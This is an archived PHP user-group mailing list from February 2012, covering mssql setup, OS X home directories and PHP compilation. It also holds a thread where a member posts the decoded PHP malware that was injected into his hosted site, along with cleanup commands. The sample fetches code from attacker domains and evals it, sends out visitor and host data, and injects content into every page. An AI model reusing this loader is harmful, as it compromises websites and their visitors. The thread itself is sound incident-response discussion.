From rainelemental at gmail.com Sat Feb 18 13:43:59 2012
From: rainelemental at gmail.com (Federico Ulfo)
Date: Sat, 18 Feb 2012 13:43:59 -0500
Subject: [nycphp-talk] Share up!
Message-ID:

PHP ninjas I'd like to spend some good time with you sharing skills about Continuous Integration (CI), Amazon (AWS) and other kick ass stuff around PHP. What about next week at Tea Lounge (Park Slope)?

From krook at us.ibm.com Mon Feb 20 10:48:03 2012
From: krook at us.ibm.com (Daniel Krook)
Date: Mon, 20 Feb 2012 10:48:03 -0500
Subject: [nycphp-talk] Share up!
In-Reply-To:
References:
Message-ID:

Hi Federico,

> PHP ninjas I'd like to spend some good time with you sharing skills
> about Continuous Integration (CI), Amazon (AWS) and other kick ass
> stuff around PHP. What about next week at Tea Lounge (Park Slope)?

Next Tuesday is the monthly NYPHP meeting in Manhattan, Justin DeMaris from Buddy Media is going to talk about AWS and some private cloud tech.

http://www.nyphp.org/

Thanks,
-Dan

Daniel Krook
Software Engineer, Advanced Cloud Technology, GTS, IBM
IBM Level 2 Certified IT Specialist - Java EE, PHP, BlackBerry, DB2 & Solaris Certified

From tuon1 at netzero.net Mon Feb 20 23:14:22 2012
From: tuon1 at netzero.net (tuon1 at netzero.net)
Date: Tue, 21 Feb 2012 04:14:22 GMT
Subject: [nycphp-talk] mssql_connect() problem
Message-ID: <20120220.221422.26068.0@webmail08.dca.untd.com>

I'm a novice in mssql world and just getting started to learn how to program mssql in PHP. I'm having trouble getting PHP to execute my code below. It seems that PHP doesn't recognize mssql_connect() as the error message stated so. See the error message following the code.

Can anyone tell me what's wrong with it?

Thanks in advance.
Paul

Here's the error message:

Fatal error: Call to undefined function mssql_connect() in E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on line 8

From sbritton at gmail.com Mon Feb 20 23:20:35 2012
From: sbritton at gmail.com (Stephen Britton)
Date: Mon, 20 Feb 2012 23:20:35 -0500
Subject: [nycphp-talk] mssql_connect() problem
In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com>
References: <20120220.221422.26068.0@webmail08.dca.untd.com>
Message-ID:

Change:

$localhost="db40442xxx.db.example.com";

to

$localhost="localhost";

And that should fix it.

On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote:

> I'm a novice in mssql world and just getting started to learn how to
> program mssql in PHP. I'm having trouble getting PHP to execute my code
> below. It seems that PHP doesn't recognize mssql_connect() as the error
> message stated so. See the error message following the code.
>
> Can anyone tell me what's wrong with it?
>
> Thanks in advance.
>
> Paul
>
> <?php
> $database="db40442xxx";
> $localhost="db40442xxx.db.example.com";
> $username="dbo40442xxx";
> $password="databasepass1";
>
> /* Initialize and connect the database */
> $conn = mssql_connect($localhost, $username, $password); //Line 8
> if (!$conn)
> {
> die('Could not connect: ' . mssql_get_last_message());
> }
> mssql_select_db($database, $conn) or die( "Unable to select database. " .
> mssql_get_last_message());
>
> ?>
>
> Here's the error message:
>
> Fatal error: Call to undefined function mssql_connect() in
> E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php
> on line 8
>
> _______________________________________________
> New York PHP User Group Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk
>
> http://www.nyphp.org/show-participation

--
Stephen Britton
Technology Consultant
sbritton at gmail.com
Twitter: @StephenBritton
ph: 914-661-0040

"Life isn't about finding yourself. Life is about creating yourself." - George Bernard Shaw

From cvasquez39 at gmail.com Mon Feb 20 23:27:38 2012
From: cvasquez39 at gmail.com (Charles Vasquez)
Date: Mon, 20 Feb 2012 23:27:38 -0500
Subject: [nycphp-talk] mssql_connect() problem
In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com>
References: <20120220.221422.26068.0@webmail08.dca.untd.com>
Message-ID:

Hi all, Paul.

You may also want to check your system's path variable for php.ini. You may also want to examine phpinfo for the location of the php.ini file. One thing that worked for me is to copy the php.ini file from the directory resides in currently c:\Windows directory.

Hope this helps,

Charles

On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote:

> I'm a novice in mssql world and just getting started to learn how to
> program mssql in PHP. I'm having trouble getting PHP to execute my code
> below. It seems that PHP doesn't recognize mssql_connect() as the error
> message stated so. See the error message following the code.
>
> Can anyone tell me what's wrong with it?
>
> Thanks in advance.
>
> Paul
>
> <?php
> $database="db40442xxx";
> $localhost="db40442xxx.db.example.com";
> $username="dbo40442xxx";
> $password="databasepass1";
>
> /* Initialize and connect the database */
> $conn = mssql_connect($localhost, $username, $password); //Line 8
> if (!$conn)
> {
> die('Could not connect: ' . mssql_get_last_message());
> }
> mssql_select_db($database, $conn) or die( "Unable to select database. " .
> mssql_get_last_message());
>
> ?>
>
> Here's the error message:
>
> Fatal error: Call to undefined function mssql_connect() in
> E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php
> on line 8

From rakics at gmail.com Tue Feb 21 05:39:20 2012
From: rakics at gmail.com (Sasa Rakic - Gmail)
Date: Tue, 21 Feb 2012 11:39:20 +0100
Subject: [nycphp-talk] mssql_connect() problem
In-Reply-To:
References: <20120220.221422.26068.0@webmail08.dca.untd.com>
Message-ID: <011701ccf085$12bd8a70$38389f50$@gmail.com>

Hi Paul,

From the path it seems that you have Windows installed. Could you please tell me whether you have these three lines uncommented in your php.ini:

Commented:

; extension=php_mssql.dll

Uncommented:

[PHP_MSSQL]
extension=php_mssql.dll
extension=php_sqlsrv.dll
extension=php_pdo_sqlsrv.dll

Best regards,
Sasa

From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On Behalf Of Charles Vasquez
Sent: Tuesday, February 21, 2012 5:28 AM
To: NYPHP Talk
Subject: Re: [nycphp-talk] mssql_connect() problem

Hi all, Paul.
You may also want to check your system's path variable for php.ini. You may also want to examine phpinfo for the location of the php.ini file. One thing that worked for me is to copy the php.ini file from the directory resides in currently c:\Windows directory.

Hope this helps,

Charles

On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote:

I'm a novice in mssql world and just getting started to learn how to program mssql in PHP. I'm having trouble getting PHP to execute my code below. It seems that PHP doesn't recognize mssql_connect() as the error message stated so. See the error message following the code.

Can anyone tell me what's wrong with it?

Thanks in advance.

Paul

Here's the error message:

Fatal error: Call to undefined function mssql_connect() in E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on line 8

From chsnyder at gmail.com Tue Feb 21 10:41:34 2012
From: chsnyder at gmail.com (Chris Snyder)
Date: Tue, 21 Feb 2012 10:41:34 -0500
Subject: [nycphp-talk] mssql_connect() problem
In-Reply-To: <20120220.221422.26068.0@webmail08.dca.untd.com>
References: <20120220.221422.26068.0@webmail08.dca.untd.com>
Message-ID:

On Mon, Feb 20, 2012 at 11:14 PM, tuon1 at netzero.net wrote:
> Can anyone tell me what's wrong with it?

> Fatal error: Call to undefined function mssql_connect() in
> E:\kunden\homepages\5\d397017418\www\Example\Registration\CreateTable.php on
> line 8

Call to undefined function implies that your version of PHP was compiled without support for MSSQL.
Take a look at this page for the probable reason: http://us3.php.net/manual/en/intro.mssql.php, and/or see the Installing/Configuring page in the same section.

Chris Snyder
http://chxor.chxo.com/

From ron at vnetworx.net Tue Feb 21 20:19:47 2012
From: ron at vnetworx.net (Ron Guerin)
Date: Tue, 21 Feb 2012 20:19:47 -0500
Subject: [nycphp-talk] OS X home directory PHP-CLI
Message-ID: <4F4442B3.5010403@vnetworx.net>

I don't have a Mac, and I haven't turned up much useful in Google, so I'm hoping someone here has written a CLI PHP script for OS X.

I understand that you can't count on HOME to be set. Is there a reliable way to find the user's home directory on OS X in PHP?

- Ron

From rainelemental at gmail.com Tue Feb 21 20:26:32 2012
From: rainelemental at gmail.com (Federico Ulfo)
Date: Tue, 21 Feb 2012 20:26:32 -0500
Subject: [nycphp-talk] OS X home directory PHP-CLI
In-Reply-To: <4F4442B3.5010403@vnetworx.net>
References: <4F4442B3.5010403@vnetworx.net>
Message-ID:

$home_dir = exec( "cd ~
pwd" );

On Tue, Feb 21, 2012 at 8:19 PM, Ron Guerin wrote:

> I don't have a Mac, and I haven't turned up much useful in Google, so
> I'm hoping someone here has written a CLI PHP script for OS X.
>
> I understand that you can't count on HOME to be set. Is there a
> reliable way to find the user's home directory on OS X in PHP?
>
> - Ron
From rmarscher at beaffinitive.com Wed Feb 22 00:01:51 2012
From: rmarscher at beaffinitive.com (Rob Marscher)
Date: Wed, 22 Feb 2012 00:01:51 -0500
Subject: [nycphp-talk] OS X home directory PHP-CLI
In-Reply-To:
References: <4F4442B3.5010403@vnetworx.net>
Message-ID: <2589D9F4-AB7B-48DC-A543-07CA0185853B@beaffinitive.com>

> On Tue, Feb 21, 2012 at 8:19 PM, Ron Guerin wrote:
> I don't have a Mac, and I haven't turned up much useful in Google, so
> I'm hoping someone here has written a CLI PHP script for OS X.
>
> I understand that you can't count on HOME to be set. Is there a
> reliable way to find the user's home directory on OS X in PHP?

On Feb 21, 2012, at 8:26 PM, Federico Ulfo wrote:
> $home_dir = exec( "cd ~
> pwd" );

FWIW, $_ENV['HOME'] is set on my laptop. Here's Federico's technique on one line with backticks:

$home = `cd ~; pwd`;

From david at davidmintz.org Fri Feb 24 13:07:29 2012
From: david at davidmintz.org (David Mintz)
Date: Fri, 24 Feb 2012 13:07:29 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
Message-ID:

My Dreamhost shared hosting account just had its *.php injected with some garbage. People were getting stuff about "CHEAP High Quality Christian Louboutin replica shoes, pumps and boots." Someone also reported to me that he was redirected to a porn site. I also found a slew of images and all kinds of... stuff.

I changed my shell password, and I did this:

egrep -lr '<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>' *| xargs perl -i -p -e 's/<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>//'

which appears to have purged everything of the injected code. (I am pretty confident that I have never used eval(base64_decode()) for any purpose myself.) Now I kind of regret not saving a few of the compromised files for study.

Any other suggestions as to what I should do?
Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what. I do know Dreamhost had a well-publicized security compromise recently. The php injection that happened to me seems to have happened on Feb 21, based on the file modification times.

You can lecture me about being a fool to use Dreamhost if you like.

Thanks.

--
David Mintz
http://davidmintz.org/
It ain't over:
http://www.healthcare-now.org/

From rainelemental at gmail.com Fri Feb 24 13:23:17 2012
From: rainelemental at gmail.com (federico ulfo)
Date: Fri, 24 Feb 2012 13:23:17 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To:
References:
Message-ID: <6666163227676099757@unknownmsgid>

Search for any type of form in your web folder, that's a common way to upload new php files!

I could search for any occurrence of exec, system and eval as well!

Good luck

Sent from my iPhone

On Feb 24, 2012, at 1:07 PM, David Mintz wrote:

My Dreamhost shared hosting account just had its *.php injected with some garbage. People were getting stuff about "CHEAP High Quality Christian Louboutin replica shoes, pumps and boots." Someone also reported to me that he was redirected to a porn site. I also found a slew of images and all kinds of... stuff.

I changed my shell password, and I did this:

egrep -lr '<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>' *| xargs perl -i -p -e 's/<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>//'

which appears to have purged everything of the injected code. (I am pretty confident that I have never used eval(base64_decode()) for any purpose myself.) Now I kind of regret not saving a few of the compromised files for study.

Any other suggestions as to what I should do?
Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what. I do know Dreamhost had a well-publicized security compromise recently. The php injection that happened to me seems to have happened on Feb 21, based on the file modification times.

You can lecture me about being a fool to use Dreamhost if you like.

Thanks.

--
David Mintz
http://davidmintz.org/
It ain't over:
http://www.healthcare-now.org/

From ronald.bradford at gmail.com Fri Feb 24 13:35:50 2012
From: ronald.bradford at gmail.com (Ronald Bradford)
Date: Fri, 24 Feb 2012 11:35:50 -0700
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To: <6666163227676099757@unknownmsgid>
References: <6666163227676099757@unknownmsgid>
Message-ID:

Have you compared your code with a backup before the injection date, or the last version of code from your version control system?

On Feb 24, 2012 12:24 PM, "federico ulfo" wrote:

> Search for any type of form in your web folder, that's a common way to
> upload new php files!
>
> I could search for any occurrence of exec, system and eval as well!
>
> Good luck
>
> Sent from my iPhone
>
> On Feb 24, 2012, at 1:07 PM, David Mintz wrote:
>
> My Dreamhost shared hosting account just had its *.php injected with some
> garbage. People were getting stuff about "CHEAP High Quality Christian
> Louboutin replica shoes, pumps and boots." Someone also reported to me that
> he was redirected to a porn site. I also found a slew of images and all
> kinds of... stuff.
>
> I changed my shell password, and I did this:
>
> egrep -lr '<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>' *| xargs
> perl -i -p -e 's/<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>//'
>
> which appears to have purged everything of the injected code. (I am pretty
> confident that I have never used eval(base64_decode()) for any purpose
> myself.) Now I kind of regret not saving a few of the compromised files
> for study.
>
> Any other suggestions as to what I should do? Unfortunately I do not know
> how this happened; don't know if there is a huge vulnerability in one of
> the apps up there that was exploited, or if it was an inside job, or what.
> I do know Dreamhost had a well-publicized security compromise recently. The
> php injection that happened to me seems to have happened on Feb 21, based
> on the file modification times.
>
> You can lecture me about being a fool to use Dreamhost if you like.
>
> Thanks.
>
> --
> David Mintz
> http://davidmintz.org/
> It ain't over:
> http://www.healthcare-now.org/
From rmarscher at beaffinitive.com Fri Feb 24 14:09:00 2012
From: rmarscher at beaffinitive.com (Rob Marscher)
Date: Fri, 24 Feb 2012 14:09:00 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To:
References:
Message-ID: <32F35E41-A55C-4CA4-8317-6B3E0029C44A@beaffinitive.com>

On Feb 24, 2012, at 1:07 PM, David Mintz wrote:
> Unfortunately I do not know how this happened; don't know if there is a huge vulnerability in one of the apps up there that was exploited, or if it was an inside job, or what.

Our company wordpress blog was compromised a few months ago due to a vulnerability in the "timthumb.php" image resizing script in one of the themes.

http://www.terranetwork.net/blog/2011/08/new-vulnerability-in-many-wordpress-themes/

The hackers uploaded a couple files that trick the server by starting with a gif signature but then have php code in them. Those files then open a backdoor that allows for additional scripts to be uploaded that essentially give shell access to the compromised machine.

In our case, the rest of the machine was locked down enough that no harm was done.

Anyway, that might be something to look for. Good luck.

-Rob

From david at davidmintz.org Fri Feb 24 16:04:00 2012
From: david at davidmintz.org (David Mintz)
Date: Fri, 24 Feb 2012 16:04:00 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To:
References: <6666163227676099757@unknownmsgid>
Message-ID:

On Fri, Feb 24, 2012 at 1:35 PM, Ronald Bradford wrote:

> Have you compared your code with a backup before the injection date, or
> the last version of code from your version control system?

You mean, compared it in its newly sanitized state with a backup from before the attack? Er, not really. Most of what I have under this account is informal, hobby-type stuff and I have been remiss about full backups.
I think I will change my ways.

The eval(base64_decode()) stuff has been removed. I saved some for analysis' sake and have started looking at it, out of curiosity:

if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {
    $_SERVER['mr_no'] = 1;
    if (!function_exists('mrobh')) {

        function get_tds_777($url) {
            $content = "";
            $content = @trycurl_777($url);
            if ($content !== false) return $content;
            $content = @tryfile_777($url);
            if ($content !== false) return $content;
            $content = @tryfopen_777($url);
            if ($content !== false) return $content;
            $content = @tryfsockopen_777($url);
            if ($content !== false) return $content;
            $content = @trysocket_777($url);
            if ($content !== false) return $content;
            return '';
        }

        function trycurl_777($url) {
            if (function_exists('curl_init') === false) return false;
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            $result = curl_exec($ch);
            curl_close($ch);
            if ($result == "") return false;
            return $result;
        }

        function tryfile_777($url) {
            if (function_exists('file') === false) return false;
            $inc = @file($url);
            $buf = @implode('', $inc);
            if ($buf == "") return false;
            return $buf;
        }

        function tryfopen_777($url) {
            if (function_exists('fopen') === false) return false;
            $buf = '';
            $f = @fopen($url, 'r');
            if ($f) {
                while (!feof($f)) {
                    $buf.=fread($f, 10000);
                }
                fclose($f);
            } else return false;
            if ($buf == "") return false;
            return $buf;
        }

        function tryfsockopen_777($url) {
            if (function_exists('fsockopen') === false) return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $f = @fsockopen($host, 80, $errno, $errstr, 30);
            if (!$f) return false;
            $request = "GET $uri HTTP/1.0\n";
            $request.="Host: $host\n\n";
            fwrite($f, $request);
            $buf = '';
            while (!feof($f)) {
                $buf.=fread($f, 10000);
            }
            fclose($f);
            if ($buf == "") return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }

        function trysocket_777($url) {
            if (function_exists('socket_create') === false) return false;
            $p = @parse_url($url);
            $host = $p['host'];
            $uri = $p['path'] . '?' . $p['query'];
            $ip1 = @gethostbyname($host);
            $ip2 = @long2ip(@ip2long($ip1));
            if ($ip1 != $ip2) return false;
            $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if (!@socket_connect($sock, $ip1, 80)) {
                @socket_close($sock);
                return false;
            }
            $request = "GET $uri HTTP/1.0\n";
            $request.="Host: $host\n\n";
            socket_write($sock, $request);
            $buf = '';
            while ($t = socket_read($sock, 10000)) {
                $buf.=$t;
            }
            @socket_close($sock);
            if ($buf == "") return false;
            list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
            return $buf;
        }

        function update_tds_file_777($tdsfile) {
            $actual1 = $_SERVER['s_a1'];
            $actual2 = $_SERVER['s_a2'];
            $val = get_tds_777($actual1);
            if ($val == "") $val = get_tds_777($actual2);
            $f = @fopen($tdsfile, "w");
            if ($f) {
                @fwrite($f, $val);
                @fclose($f);
            }
            if (strstr($val, "|||CODE|||")) {
                list($val, $code) = explode("|||CODE|||", $val);
                eval(base64_decode($code));
            }
            return $val;
        }

        function get_actual_tds_777() {
            $defaultdomain = $_SERVER['s_d1'];
            $dir = $_SERVER['s_p1'];
            $tdsfile = $dir . "log1.txt";
            if (@file_exists($tdsfile)) {
                $mtime = @filemtime($tdsfile);
                $ctime = time() - $mtime;
                if ($ctime > $_SERVER['s_t1']) {
                    $content = update_tds_file_777($tdsfile);
                } else {
                    $content = @file_get_contents($tdsfile);
                }
            } else {
                $content = update_tds_file_777($tdsfile);
            }
            $tds = @explode("\n", $content);
            $c = @count($tds) + 0;
            $url = $defaultdomain;
            if ($c > 1) {
                $url = trim($tds[mt_rand(0, $c - 2)]);
            }
            return $url;
        }

        function is_mac_777($ua) {
            $mac = 0;
            if (stristr($ua, "mac") || stristr($ua, "safari"))
                if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))
                    $mac = 1;
            return $mac;
        }

        function is_msie_777($ua) {
            $msie = 0;
            if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9")) $msie = 1;
            return $msie;
        }

        function setup_globals_777() {
            $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
            $mz = "/tmp/";
            if (!is_dir($rz)) {
                @mkdir($rz);
                if (is_dir($rz)) {
                    $mz = $rz;
                } else {
                    $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
                    if (!is_dir($rz)) {
                        @mkdir($rz);
                        if (is_dir($rz)) {
                            $mz = $rz;
                        }
                    } else {
                        $mz = $rz;
                    }
                }
            } else {
                $mz = $rz;
            }
            $bot = 0;
            $ua = $_SERVER['HTTP_USER_AGENT'];
            if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;
            if (stristr($ua, "bingbot") || stristr($ua, "google")) $bot = 1;
            $msie = 0;
            if (is_msie_777($ua)) $msie = 1;
            $mac = 0;
            if (is_mac_777($ua)) $mac = 1;
            if (($msie == 0) && ($mac == 0)) $bot = 1;
            global $_SERVER;
            $_SERVER['s_p1'] = $mz;
            $_SERVER['s_b1'] = $bot;
            $_SERVER['s_t1'] = 1200;
            $_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
            $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);
            $_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
            $_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
            $_SERVER['s_script'] = "mm.php?d=1";
        }

        setup_globals_777();

        if (!function_exists('gml_777')) {
            function gml_777() {
                $r_string_777 = '';
                if ($_SERVER['s_b1'] == 0) $r_string_777 = '';
                return $r_string_777;
            }
        }

        if (!function_exists('gzdecodeit')) {
            function gzdecodeit($decode) {
                $t = @ord(@substr($decode, 3, 1));
                $start = 10;
                $v = 0;
                if ($t & 4) {
                    $str = @unpack('v', substr($decode, 10, 2));
                    $str = $str[1];
                    $start+=2 + $str;
                }
                if ($t & 8) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 16) {
                    $start = @strpos($decode, chr(0), $start) + 1;
                }
                if ($t & 2) {
                    $start+=2;
                }
                $ret = @gzinflate(@substr($decode, $start));
                if ($ret === FALSE) {
                    $ret = $decode;
                }
                return $ret;
            }
        }

        function mrobh($content) {
            @Header('Content-Encoding: none');
            $decoded_content = gzdecodeit($content);
            if (preg_match('/\<\/body/si', $decoded_content)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);
            } else {
                return $decoded_content . gml_777();
            }
        }

        ob_start('mrobh');
    }
}

--
David Mintz
http://davidmintz.org/
It ain't over:
http://www.healthcare-now.org/

From rmarscher at beaffinitive.com Fri Feb 24 16:08:06 2012
From: rmarscher at beaffinitive.com (Rob Marscher)
Date: Fri, 24 Feb 2012 16:08:06 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To:
References: <6666163227676099757@unknownmsgid>
Message-ID:

On Feb 24, 2012, at 4:04 PM, David Mintz wrote:
...snip...
> ob_start('mrobh')
...snip...

I did a little googling and found this pretty relevant article:
http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost
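
The cleanup discussed in this thread, as an added example that is not part of any list member's message: a POSIX shell version of David's egrep/perl one-liner that first saves an untouched copy of each infected file (modification time included) for later study, and that also lists the `.logs/log1.txt` cache files the decoded sample writes. The function names, the quarantine layout and the tree built by `make_sample` are assumptions made for illustration; the payload in the sample is a constructed, harmless placeholder.

```shell
#!/bin/sh
# Added example, not from the thread. SIG is the pattern from David's
# egrep/perl one-liner; function names and directory layout are assumptions.
SIG='<\?php.+eval\(base64_decode\("[^"]+"\)\);\?>'

# list_infected ROOT
# Print each *.php file under ROOT that contains the injected block.
list_infected() {
    find "$1" -type f -name '*.php' -exec grep -lE "$SIG" {} + 2>/dev/null || true
}

# list_dropped ROOT
# Print cache files of the kind the decoded sample creates: a ".logs"
# directory holding "log1.txt" (see setup_globals_777 / get_actual_tds_777).
list_dropped() {
    find "$1" -type f -path '*/.logs/log1.txt' 2>/dev/null || true
}

# clean_tree ROOT QUARANTINE
# For every infected file: keep an untouched copy under QUARANTINE (same
# relative path), then strip the injected block. QUARANTINE must be outside
# ROOT and outside the web root. Prints "cleaned <relative path>" per file.
clean_tree() {
    ct_root=${1%/}
    ct_qdir=${2%/}
    list_infected "$ct_root" | while IFS= read -r ct_file; do
        ct_rel=${ct_file#"$ct_root"/}
        mkdir -p "$ct_qdir/$(dirname "$ct_rel")"
        # -p keeps the modification time, which is what dated the
        # compromise in the thread.
        cp -p "$ct_file" "$ct_qdir/$ct_rel"
        ct_tmp=$(mktemp)
        # Same substitution as the perl one-liner. The greedy ".+" removes
        # everything from the first "<?php" on the line up to the eval, so
        # diff each result against its quarantined copy before trusting it.
        sed -E "s/$SIG//" "$ct_file" > "$ct_tmp"
        cat "$ct_tmp" > "$ct_file"    # overwrite in place: owner and mode stay
        rm -f "$ct_tmp"
        printf 'cleaned %s\n' "$ct_rel"
    done
}

# make_sample DIR
# Build a small constructed tree to try the functions on: one infected file,
# one clean file, one dropped cache file.
make_sample() {
    mkdir -p "$1/lib" "$1/.logs"
    printf '%s\n' '<?php /**/ eval(base64_decode("Y29uc3RydWN0ZWQ="));?><?php echo "home"; ?>' > "$1/index.php"
    printf '%s\n' '<?php echo "library"; ?>' > "$1/lib/ok.php"
    printf '%s\n' 'http://placeholder.invalid/' > "$1/.logs/log1.txt"
}

# Usage: sh clean.sh /path/to/webroot /path/outside/webroot/quarantine
if [ "$#" -eq 2 ]; then
    list_dropped "$1"
    clean_tree "$1" "$2"
fi
```

Stripping the block only removes the symptom; the `.logs` directories it reports and any files the attacker uploaded still have to be reviewed and removed separately.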
From rmarscher at beaffinitive.com Fri Feb 24 16:11:03 2012
From: rmarscher at beaffinitive.com (Rob Marscher)
Date: Fri, 24 Feb 2012 16:11:03 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To:
References: <6666163227676099757@unknownmsgid>
Message-ID: <3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com>

On Feb 24, 2012, at 4:08 PM, Rob Marscher wrote:

> On Feb 24, 2012, at 4:04 PM, David Mintz wrote:
> ...snip...
>> ob_start('mrobh')
> ...snip...
>
> I did a little googling and found this pretty relevant article:
> http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost
>

And another cleanup suggestion:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html

From david at davidmintz.org Fri Feb 24 16:12:41 2012
From: david at davidmintz.org (David Mintz)
Date: Fri, 24 Feb 2012 16:12:41 -0500
Subject: [nycphp-talk] I've been hit with an eval(base64_decode("....")) injection attack
In-Reply-To: <3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com>
References: <6666163227676099757@unknownmsgid> <3D8D5C26-7250-47C8-91DE-791D8679DB1F@beaffinitive.com>
Message-ID:

On Fri, Feb 24, 2012 at 4:11 PM, Rob Marscher wrote:

>
> On Feb 24, 2012, at 4:08 PM, Rob Marscher wrote:
>
> On Feb 24, 2012, at 4:04 PM, David Mintz wrote:
> ...snip...
>
> ob_start('mrobh')
>
> ...snip...
>
> I did a little googling and found this pretty relevant article:
>
> http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost
>
>
> And another cleanup suggestion:
>
> http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html
>
>
>

Very helpful! Thank you.
--
David Mintz
http://davidmintz.org/
It ain't over:
http://www.healthcare-now.org/

From papillion at gmail.com Wed Feb 29 15:23:47 2012
From: papillion at gmail.com (Anthony Papillion)
Date: Wed, 29 Feb 2012 14:23:47 -0600
Subject: [nycphp-talk] Compiling PHP 5+
Message-ID:

I'm writing a command line tool that I want to compile so it can be used on systems that don't have PHP installed (specifically, Windows systems). Does anyone know of a tool that compiles PHP 5?

Thanks!
Anthony

From rainelemental at gmail.com Wed Feb 29 15:28:10 2012
From: rainelemental at gmail.com (Federico Ulfo)
Date: Wed, 29 Feb 2012 15:28:10 -0500
Subject: [nycphp-talk] Compiling PHP 5+
In-Reply-To:
References:
Message-ID:

Facebook Hip Hop PHP,
https://github.com/facebook/hiphop-php

On Wed, Feb 29, 2012 at 3:23 PM, Anthony Papillion wrote:

> I'm writing a command line tool that I want to compile so it can be used
> on systems that don't have PHP installed (specifically, Windows systems).
> Does anyone know of a tool that compiles PHP 5?
>
> Thanks!
> Anthony

From papillion at gmail.com Wed Feb 29 15:33:48 2012
From: papillion at gmail.com (Anthony Papillion)
Date: Wed, 29 Feb 2012 14:33:48 -0600
Subject: [nycphp-talk] Compiling PHP 5+
In-Reply-To:
References:
Message-ID:

On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo wrote:
>
> Facebook Hip Hop PHP,
> https://github.com/facebook/hiphop-php

Thank you! I'd completely forgotten about Hip Hop. Never had a chance to use it and got away from PHP for a few months. Good excuse to give it a try on my dive back in.
Thanks again.

Anthony

From jeff at jeffslutz.com Wed Feb 29 15:35:21 2012
From: jeff at jeffslutz.com (Jeff Slutz)
Date: Wed, 29 Feb 2012 15:35:21 -0500
Subject: [nycphp-talk] Compiling PHP 5+
In-Reply-To:
References:
Message-ID:

Let us know what you find. I've been itching to give it a whirl too but haven't had the time or excuse yet.

JS
--
Jeff Slutz
JSLEUTH LLC
3242 44th ST APT 3F
Astoria, NY 11103
c. 970.443.9390
jeff at jeffslutz.com

On Wed, Feb 29, 2012 at 3:33 PM, Anthony Papillion wrote:

> On Wed, Feb 29, 2012 at 2:28 PM, Federico Ulfo
> wrote:
> >
> > Facebook Hip Hop PHP,
> > https://github.com/facebook/hiphop-php
>
> Thank you! I'd completely forgotten about Hip Hop. Never had a chance
> to use it and got away from PHP for a few months. Good excuse to give
> it a try on my dive back in. Thanks again.
>
> Anthony

From cvasquez39 at gmail.com Wed Feb 29 16:01:18 2012
From: cvasquez39 at gmail.com (Charles Vasquez)
Date: Wed, 29 Feb 2012 16:01:18 -0500
Subject: [nycphp-talk] Compiling PHP 5+
In-Reply-To:
References:
Message-ID:

what is hip hop? When you speak about compiling do you mean creating a windows dll or something? I am new to this type of speak, not new to php, but the php community. I practice php for personal purposes.

Charles

On Wed, Feb 29, 2012 at 3:35 PM, Jeff Slutz wrote:

